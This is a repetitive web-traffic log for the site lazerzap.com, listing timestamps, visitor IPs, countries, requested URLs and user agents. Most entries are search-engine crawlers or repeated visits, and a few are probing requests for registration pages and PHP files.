http://www.opensiteexplorer.org/dotbot, help@moz.com) No Referrer Jul 06 - 06:00 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 06 - 06:00 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 06 - 06:00 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 06 - 06:00 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 06 - 06:00 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 06 - 06:00 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 06 - 06:00 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 06 - 06:00 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 06 - 06:00 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 06 - 06:00 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 06 - 06:00 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 06 - 06:00 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 06 - 06:00 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 06 - 06:00 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 06 - 06:00 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 06 - 06:00 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 06 - 06:04 United States 157.55.39.180 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) No Referrer Jul 06 - 06:22 United States 54.36.148.33 http://lazerzap.com/index.php/component/users/ts_files/visitor_data.html lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 06 - 06:27 United States 66.249.66.78 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 06 - 06:41 United States 54.36.149.69 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 06 - 06:59 United States 13.57.233.99 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36 No Referrer Jul 06 - 07:05 23.229.105.198 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 OPR/53.0.2907.99 http://lazerzap.com Jul 06 - 07:25 United States 40.77.167.91 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] iPhone Unknown Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) No Referrer Jul 06 - 07:34 United States 66.249.66.78 http://lazerzap.com/index.php/+/ts_files/randomimages.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 06 - 07:42 Russian Federation 46.161.9.56 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Firefox Mozilla/5.0 (Windows NT 7.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0 http://lazerzap.com/ Jul 06 - 07:49 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 06 - 07:49 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 06 - 07:49 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 06 - 07:49 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 06 - 07:49 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 06 - 07:49 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 06 - 07:49 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 06 - 07:49 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 06 - 07:49 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 06 - 07:49 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 06 - 07:49 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 06 - 07:49 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 06 - 07:49 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 06 - 07:49 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 06 - 07:49 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 06 - 07:49 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 06 - 07:49 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 06 - 07:49 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 06 - 07:49 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 06 - 07:49 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 06 - 07:49 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 06 - 07:49 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 06 - 07:49 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 06 - 07:49 Australia 131.181.68.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36 No Referrer Jul 06 - 08:39 France 46.105.124.55 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Chrome Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36 OPR/49.0.2725.47 https://lazerzap.com/ Jul 06 - 08:40 Russian Federation 212.92.115.7 http://lazerzap.com/index.php?user/create_form/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 http://lazerzap.com/index.php?user/create_form/ Jul 07 - 09:31 45.33.72.115 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 No Referrer Jul 07 - 09:47 192.99.2.195 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 OPR/53.0.2907.68 http://lazerzap.com Jul 07 - 10:24 Poland 91.236.74.8 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win Vista Firefox Mozilla/5.0 (Windows NT 6.0; Win64; rv:35.0) Gecko/20100101 Firefox/35.0 http://lazerzap.com/ Jul 07 - 11:26 China 111.206.36.136 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 http://www.baidu.com/s?wd=railroad13k Jul 07 - 11:41 France 188.165.230.165 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Firefox Mozilla/5.0 (Windows NT 10.0; rv:57.0) Gecko/20100101 Firefox/57.0 http://lazerzap.com/ Jul 07 - 11:43 United States 54.36.149.23 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 07 - 12:09 Russian Federation 5.188.211.15 http://www.lazerzap.com/index.php?user/create_form/randomimages.php www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win XP Internet Explorer 6 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) No Referrer Jul 07 - 12:09 Russian Federation 5.188.211.15 http://www.lazerzap.com/index.php?user/create_form/randomimages.phpupdatetopsites.php www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win XP Internet Explorer 6 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) No Referrer Jul 07 - 12:09 Russian Federation 5.188.211.15 http://www.lazerzap.com/index.php?user/create_form/randomimages.phprandomimages.php www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win XP Internet Explorer 6 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) No Referrer Jul 07 - 12:09 Russian Federation 5.188.211.15 http://www.lazerzap.com/index.php www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win XP Internet Explorer 6 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) No Referrer Jul 07 - 12:14 Finland 83.136.253.203 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Chrome Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11 No Referrer Jul 07 - 12:57 China 180.76.15.32 http://www.lazerzap.com/index.php/component/users/updatetopsites.php www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) No Referrer Jul 07 - 13:03 Germany 138.201.59.34 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; SEOkicks; +http://www.seokicks.de/robot.html) No Referrer Jul 07 - 13:31 China 115.239.212.199 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 http://www.baidu.com/s?wd=birthaa9 Jul 07 - 13:40 Australia 14.201.195.86 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Firefox Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0 No Referrer Jul 07 - 14:02 United Kingdom 82.145.59.208 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.9) Gecko/20100101 Goanna/3.4 Firefox/52.9 PaleMoon/27.8.1 http://lazerzap.com Jul 07 - 14:17 Russian Federation 5.255.250.160 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots) No Referrer Jul 07 - 14:17 Russian Federation 5.255.250.160 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots) No Referrer Jul 07 - 14:31 United States 40.77.167.91 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) No Referrer Jul 07 - 14:52 China 123.125.143.7 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 http://www.baidu.com/s?wd=FW94 Jul 07 - 15:45 United States 54.193.61.122 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36 No Referrer Jul 07 - 15:45 United States 54.183.212.24 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Chrome Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/63.0.3205.0 Safari/537.36 No Referrer Jul 07 - 15:45 United States 13.57.11.146 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 No Referrer Jul 07 - 15:45 United States 13.57.11.146 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 No Referrer Jul 07 - 15:45 United States 13.57.11.146 http://lazerzap.com/index.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 No Referrer Jul 07 - 15:45 United States 13.57.11.146 http://lazerzap.com/index.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 No Referrer Jul 07 - 16:17 China 180.76.15.143 http://www.lazerzap.com/index.php/mber/ts_files/ts_files/scroll.js www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) No Referrer Jul 07 - 16:21 United States 54.36.148.244 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 07 - 17:34 Russian Federation 188.64.173.24 http://www.lazerzap.com/index.php?option=com_users&view=registration www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win Vista Unknown Opera/9.80 (Windows NT 6.0); U; en) Presto/2.8.131 Version/11.10 No Referrer Jul 07 - 17:34 Russian Federation 188.64.173.24 http://www.lazerzap.com/index.php?option=com_user&view=register www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win Vista Unknown Opera/9.80 (Windows NT 6.0); U; en) Presto/2.5.25 Version/10.54 No Referrer Jul 07 - 17:34 Russian Federation 188.64.173.24 http://www.lazerzap.com/index.php/component/users/?view=registration www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win XP Unknown Opera/9.80 (Windows NT 5.1); U; en) Presto/2.5.25 Version/10.54 No Referrer Jul 07 - 18:16 China 106.11.157.176 http://www.lazerzap.com/index.php www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown YisouSpider No Referrer Jul 07 - 18:44 United States 38.95.109.68 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0 http://lazerzap.com/ Jul 07 - 18:44 United States 38.95.109.68 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0 http://lazerzap.com Jul 07 - 19:03 United States 157.55.39.180 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) No Referrer Jul 07 - 19:25 United States 66.249.88.93 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Chrome Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon No Referrer Jul 07 - 19:28 Ukraine 188.163.19.42 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0 http://lazerzap.com/ Jul 07 - 20:01 United States 148.64.56.65 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; GrapeshotCrawler/2.0; +http://www.grapeshot.co.uk/crawler.php) No Referrer Jul 07 - 20:01 United States 38.95.109.68 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0 http://lazerzap.com/ Jul 07 - 20:01 United States 38.95.109.68 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0 http://lazerzap.com Jul 07 - 20:03 Russian Federation 109.194.58.232 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Firefox Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 http://lazerzap.com/ Jul 07 - 20:56 Australia 14.201.195.86 http://lazerzap.com/ lazerzap.com 